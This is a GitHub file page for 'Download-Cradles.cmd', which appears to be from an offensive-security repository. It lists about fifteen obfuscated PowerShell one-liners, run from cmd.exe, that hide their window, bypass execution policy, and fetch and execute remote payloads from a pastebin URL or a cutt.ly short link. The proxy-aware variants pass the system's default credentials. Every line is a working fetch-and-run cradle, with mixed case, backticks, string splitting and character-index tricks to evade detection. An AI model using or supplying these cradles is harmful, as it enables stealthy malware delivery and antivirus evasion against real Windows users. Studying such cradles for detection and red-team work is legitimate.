-
Notifications
You must be signed in to change notification settings - Fork 51
/
Copy pathDownload-Cradles.cmd
26 lines (21 loc) · 3.55 KB
/
Download-Cradles.cmd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Not proxy aware download cradles, which can be executed in a Windows Command Shell (cmd.exe)
# Windows Command Shell download cradles, not proxy aware ligthly obfuscated
cmd> c:\WInDowS\sySTEM32\cmD.eXE /c PoWErSheLl -nopROfi -EXe byPAsS -wiNDOwsTy HIDdEN -cOMMA "IEX (New-Object Net.Webclient).downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
cmd> PoWErSheLl -nopROfi -EXe byPAsS -wiNdOwsTy HIDdEN -cOMMA "IEX (New-Object Net.Webclient).downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
cmd> POWErshelL -NoPRofi -WiNdoWSTYL hidd -EXecUTiOnPO BYpASS -cO "i`EX ( neW-o`BJE`cT N`ET.`weBcl`IeNT ).\"do`wnLO`ADS`TRinG\"( \"https://pastebin.com/raw/88SGrHVh\" )"
# Windows Command Shell download cradles, not proxy aware obfuscated
cmd> c:\wiNdoWs\sysTEM32\CmD /c pOWeRsheLl -WiNDOW HIddEN -eXECUTI BYpaSS -nop -CoMmanD "(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/88SGrHVh')|.( ([String]''.Chars)[15,18,19]-Join'')"
cmd> pOWeRshell -WiNDOW HIddEN -eXECUTI BYpaSS -nop -CoMmanD "(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/88SGrHVh')|.( ([String]''.Chars)[15,18,19]-Join'')"
cmd> pOWERShELl -NopROFi -wIN hidd -EXEcutiOnPoLiC BYpAsS -COm "$url='https://pastebin.com/raw/88SGrHVh';$wc2='Net.WebClient';$wc=(New-Object $wc2);$ds='DownloadString';$wc.$ds.Invoke($url)|Invoke-Expression"
cmd> POWERShelL -W hId -eXECuTionpoLIC BYPaSS -NOprOfiLe -cOmMA "$url='https://pastebin.com/raw/88SGrHVh';$wc2='Net.WebClient';$wc=(New-Object $wc2);$ds='DownloadString';IEX($wc.$ds.Invoke($url))"
cmd> POWeRsHeLl -cO "&( ([String]''.Normalize)[23,15,46]-Join'')(([Char[]](New-Object Net.WebClient).DownloadData('https://pastebin.com/raw/88SGrHVh'))-Join'')"
cmd> POWerSHElL -CommA "i`Ex ( nE`w-`ObJect Ne`T.WEBCl`Ient ).\"DowNlo`Ads`TRI`NG\"( \"ht\"+\"tps://pastebin.com/raw/88SGrHVh\" )"
# Proxy aware download cradles, which can be executed in a Windows Command Shell (cmd.exe)
# Info: I use a shortcut link to the raw link from your hosted payload on Github
# For example, https://cutt.ly/syFzILH directs to the raw link of hosted payload on github
# Windows Command Shell download cradles, proxy aware ligthly obfuscated
cmd> c:\wInDOwS\sysTem32\CmD /cPowErShell -wINdowstYL Hi -nop -eXecU ByPAss -COm "$c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iex $c.downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
cmd> PowErShell -wINdOwstYL Hi -nop -eXecU BYpAss -COm "$c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iex $c.downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
# Windows Command Shell download cradles, proxy aware heavy obfuscated
cmd> C:\WINdOWS\SySteM32\CmD.EXe /cpOWershEll -eXecut byPaSS -Noprof -w H -Co "$c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;`i`e`x $c.downloadstring(\"ht\"+\"tps://pastebin.com/raw/88SGrHVh\")"
cmd> poWershELl -eXecUT byPAss -WINDo 1 -nOpR -coMm "& ((vARiaBlE '*mdr*').Name[3,11,2]-JoiN'') ((('{2}c=new-obj'+'ect ne'+'t.'+'webclient;{2'+'}'+'c.p'+'roxy='+'[Net'+'.'+'WebR'+'equest]::'+'GetS'+'yst'+'emWebP'+'ro'+'x'+'y();{'+'2}c'+'.Pr'+'oxy.Cre'+'dentials=[Net'+'.Cr'+'edentialC'+'ache]::D'+'e'+'fau'+'l'+'tCredenti'+'als'+';{0}i{0}e'+'{0}x {'+'2}c.downl'+'oa'+'ds'+'t'+'ring({1}ht{1}+{1'+'}t'+'ps'+':'+'/'+'/'+'cutt.ly/syFzIL'+'H{1})') -F [cHAR]96,[cHAR]34,[cHAR]36))"